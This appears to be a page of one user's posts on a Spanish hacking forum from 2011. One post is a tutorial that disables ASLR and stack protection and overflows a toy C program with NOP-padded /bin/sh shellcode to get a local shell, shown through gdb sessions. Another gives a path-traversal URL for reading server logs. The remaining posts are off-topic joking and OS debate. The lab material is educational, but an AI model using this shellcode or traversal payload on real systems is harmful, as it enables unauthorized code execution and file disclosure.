| |
|
282
|
Seguridad Informática / Hacking / Re: Ejecutar comandos desde lectura?
|
en: 10 Febrero 2011, 19:27 pm
|
|
Wow como se llamaba esta vulnerabilidad? Es que de exploiting web estoy sin blanca jaja...
Pues lo que podrías hacer sería leer algún log de ssh o demás a ver que ves...
/index.php?mostrar=../../../../../../../../../var/log/XXX
Mmm tengo curiosidad... Alguna otra idea?
|
|
|
|
|
283
|
Seguridad Informática / Bugs y Exploits / Re: [First BoF Linux attack : Sagrini 2010 : elhacker.net] [Funciona!!!]
|
en: 10 Febrero 2011, 19:14 pm
|
¿Has probado a desactivar protecciones? $ sudo su
# echo 0 > /proc/sys/kernel/randomize_va_space
# cat /proc/sys/kernel/randomize_va_space
# exit
$
$ gcc -o vuln vuln.c --no-stack-protector -z execstack
Has copiado el code? #include <stdio.h> #include <string.h> int vuln (char *buff) { char buffer [36]; } int main (int argc, char *argv []) { vuln (argv [1]); } int feo () { }
Pues primero vemos cuántos bytes le metemos: juanra@Juanra:~/Escritorio/Shell$ gdb -q vuln
(gdb) r $(perl -e 'print "\x90" x 15 . "B"x25 . "XXXX"')
Starting program: /home/juanra/Escritorio/Shell/vuln $(perl -e 'print "\x90" x 15 . "B"x25 . "XXXX"')
Program received signal SIGSEGV, Segmentation fault.
0x58585858 in ?? ()
(gdb) r $(perl -e 'print "\x90" x 15 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "XXXX"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/juanra/Escritorio/Shell/vuln $(perl -e 'print "\x90" x 15 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "XXXX"')
Program received signal SIGSEGV, Segmentation fault.
0x58585858 in ?? ()
(gdb) br vuln
Breakpoint 1 at 0x804842a: file vuln.c, line 8.
(gdb) r AAA
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/juanra/Escritorio/Shell/vuln AAA
Breakpoint 1, vuln (buff=0xbffffb5f "AAA") at vuln.c:8
8 strcpy (buffer, buff);
(gdb) x/x buffer
0xbffff904: 0x00000000
(gdb) r $(perl -e 'print "\x90" x 11 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x04\xf9\xff\xbf"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/juanra/Escritorio/Shell/vuln $(perl -e 'print "\x90" x 11 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x04\xf9\xff\xbf"')
Breakpoint 1, vuln (
buff=0xbffffb3a '\220' <repeats 11 times>, "1�Ph//shh/bin\211�P\211�S\211��\v�\200\004���") at vuln.c:8
8 strcpy (buffer, buff);
(gdb) c
Continuing.
Executing new program: /bin/dash
(no debugging symbols found)
Error in re-setting breakpoint 1: Function "vuln" not defined.
(no debugging symbols found)
(no debugging symbols found)
$
Vamos, va perfecto... 1) Vemos cuantos bytes le metemos. En este programa dan 40. 2) Ahora, le restamos los bytes de la shellcode: 44 - 4 - 4 - 25 = 11 Los cuarenta y cuatro son para sobreescribir. La primera resta es de la dirección del ret. La segunda es porque al volver se restan cuatro bytes. Entonces tenemos: 11 NOPS + 25 SHELLCODE + 4 RET 3) Calculamos el RET: juanra@Juanra:~/Escritorio/Shell$ gdb -q vuln
(gdb) br vuln
Breakpoint 1 at 0x804842a: file vuln.c, line 8.
(gdb) r AAA
Starting program: /home/juanra/Escritorio/Shell/vuln AAA
Breakpoint 1, vuln (buff=0xbffffb5f "AAA") at vuln.c:8
8 strcpy (buffer, buff);
(gdb) x/x buffer
0xbffff904: 0x00000000
(gdb) q
The program is running. Exit anyway? (y or n) y
juanra@Juanra:~/Escritorio/Shell$
El ret cambia según qué ordenador. Tenéis que calcularlo cada uno... Ahora ejecutamos... x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x04\xf9\xff\xbf"')
$ ls
exploit exploit.c shell shell.s vuln vuln.c
$ exit
juanra@Juanra:~/Escritorio/Shell$
Si aún no va dímelo... Suerte! |
|
|
|
|
284
|
Foros Generales / Foro Libre / Re: Contestaciones verídicas de los niños en los exámenes
|
en: 10 Febrero 2011, 19:03 pm
|
5.- Di lo que sepas acerca de la expresión "Ave Cesar morituri te salutan".
Las aves de Cesar murieron por falta de salud.
(Estos gladiadores..., y la imaginación al poder)
Esa me ha encantado  Trabajo y energía: Trabajo es si cogemos una silla y la ponemos en otro sitio, energía es cuando la silla se levanta sola. (Y fuerza es cuando se rompe la silla) Los cuatro Evangelistas: Los cuatro evangelistas eran 3: San Pedro Y San Pablo. Leo y releo, y no entiendo cuál es el tercero -y último- de los 4... La catedral de León: Fue construida por los romanos gracias a un arquitecto americano. Sí, que les mandó los planos por Internet... El cerebro: Las ideas, despues de hablar se van al cerebro. ¡Ojalá! Jaja! |
|
|
|
|
285
|
Foros Generales / Foro Libre / Re: La Gioconda ........hoy
|
en: 10 Febrero 2011, 18:58 pm
|
yo personalemente creo en la belleza natural. Creo que mientras una mujer mas operada y mas acomodada mas estupida se vuelve(por supuesto no en todos los casos) pero e tenido amigas que son muy cheveres que son normales, pero el dia que se operan los senos es como si les pasaran un suiche y puff cambian completamente, por eso me gustan mas la de belleza natural aqui les dejo un video de hace mucho tiempo donde se ve que la belleza no va muy ligada de la inteligencia. http://www.youtube.com/watch?v=HjonfoQinuwJaja que pavo! Pues estoy de acuerdo contigo. No hablaría con la de la izquierda de .og ni loco jaja |
|
|
|
|
286
|
Foros Generales / Foro Libre / Re: ¿Porqué usar linux/Unix en lugar de plataforma Dos/Windows ?
|
en: 10 Febrero 2011, 18:52 pm
|
Se ve que no has usado linux ultimamente, Ubuntu instala todo mejor que windows, ya sea desde el centro de software o simplemente dandole click a los paquetes descargados o a un link especial en una pagina. Yo tengo los dos Ubuntu y WIN7, dejame decirte que en ubuntu hago TODO lo que me pide la universidad "BlueJ, netbeans, eclipse, office" etc etc, WIN7Ultimate solo lo tengo por el minitab y aun eso creo se emula bien en wine. En fin, mi ubuntu lo tengo con sensores, un widget del tiempo, y con el modificador SpeedStep de intel y le muevo a mi gusto, carga en 30 segundos o menos, por cierto los cuatro desktops te hacen la vida mucho mas facil. En cambio a WIN7 lo tengo DESNUDO tan solo tiene el AIDA, el antivirus/firewall, el minitab, sus actualizaciones y el chrome, y tarda mas de minuto y medio en iniciar osea NO MAMES, si ni lo eh usado, no quiero imaginarme si le pongo mas programas. Otra cosa, el ubuntu me agarro todo el hardware a excepcion del lector de huellas directamente, incluso me activo el HP 3D DriveGuard. El WIN7 pedorro ni siquiera me agarra el "scroll zone" de mi touchpad, cosa que ubuntu hizo desde un principio. PD es una HP elitebook DualCore T9400@2.53Ghz con 2GB de RAM y tarjeta grafica ATI no recuerdo que modelo pero de 256MB, asi que no me vengas con que mi laptop no es lo sufucientemente potente. Yeah bien hablado Pues mirad: Veo tu apuesta y resubo con mi futuro nuevo PC: https://spreadsheets.google.com/ccc?key=0Aqmz7xM13S08dGFwaDVlUFE3M0VsY0VOa0QzWGdkM1E&hl=es&authkey=CPmelNUF Y con los 700€ que me sobran me compro un portátil HP con un core i3.
Bueno, y para desimular el desvío de tema digo que yo soy windowsero, rompí bastantes veces más de una distro linux que mi windows, veo más errores "mortales" en linux que en win, y me siento más cómodo con mi visual studio  . Digo también que siempre tengo dos particiones, una con debian y otra con windows 7, ambas me ofrecen ventajas, pero en mi caso la que uso el 90% del tiempo es la de windows. Me ha gustado tu PC jaja... Ya he dicho que son carisimos, pero son buenos... |
|
|
|
|
288
|
Foros Generales / Foro Libre / Re: Contestaciones verídicas de los niños en los exámenes
|
en: 10 Febrero 2011, 00:19 am
|
Recuerdo que tuve una compañera de clase de los mayores, que no era maleja, pero que nos sorprendió a todos y mucho a mí, cuando en un examen que teníamos que hacer en la capital, después de describir estupendamente a los gatos, se descolgó con el lapsus de que eran animales de unos cuatro o cinco metros de longitud. Cuando yo le reprendí amigablemente, preguntándole que si ella no había visto ningún gato, me contestó con la mayor tranquilidad del mundo que tenía varios en su casa, que como no ibá a saber ella lo que era un minino., lo que ella no sabía era lo que medía un metro. Me tuve que callar y reírme de buena gana con ella.
Jaja, ese último ha sido muy bueno! No me río para que no me pillen  Es cierto o lo de verídico va de broma jaja... Y el último, modifico, ya me lo sabía jaja, pero es bueno también |
|
|
|
|
290
|
Foros Generales / Foro Libre / Re: Contestaciones verídicas de los niños en los exámenes
|
en: 9 Febrero 2011, 23:26 pm
|
Hala Addonis que bueno de verdad !!!
qué graciosos !!!
pero son niños .....y bueno hay que disculparles ...
Mi padre, cuando hacía la mili le preguntaron
de qué color era el caballo blanco de Santiago ??...y dijo que Negro ....
Ni te imaginas el cachondeo que siempre ha habido con eso,,....cuando alguna vez le ha dicho a alguien que se equivocaba le han contestado....tu calla , que dijiste que el caballo blanco de Santiago era negro !!
Wow, muy buenos jeje.. Constance... ¿Qué clase de niños? Yo conozco algunos bien vejetes jaja... Pues negro. El caballo se llamaba Blanco, pero como el que lo escribió se saltó ortografía... Era negro ??? ...pues por qué todo el mundo da por sentado que era blanco ??
Ya te digo....si al final ni sería un caballo que sería un burro ???
por cierto hablando de caballos ???.......me encantaría aprender a montar a caballo ..
Porque nadie sabe de ortografía No, taaaaaanto no creo que sea... A lo mejor era yegua disfrazada  A mi no. Yo prefiero las excursiones, pero con gente  |
|
|
|
|
|
| |
|
Mostrar Mensajes
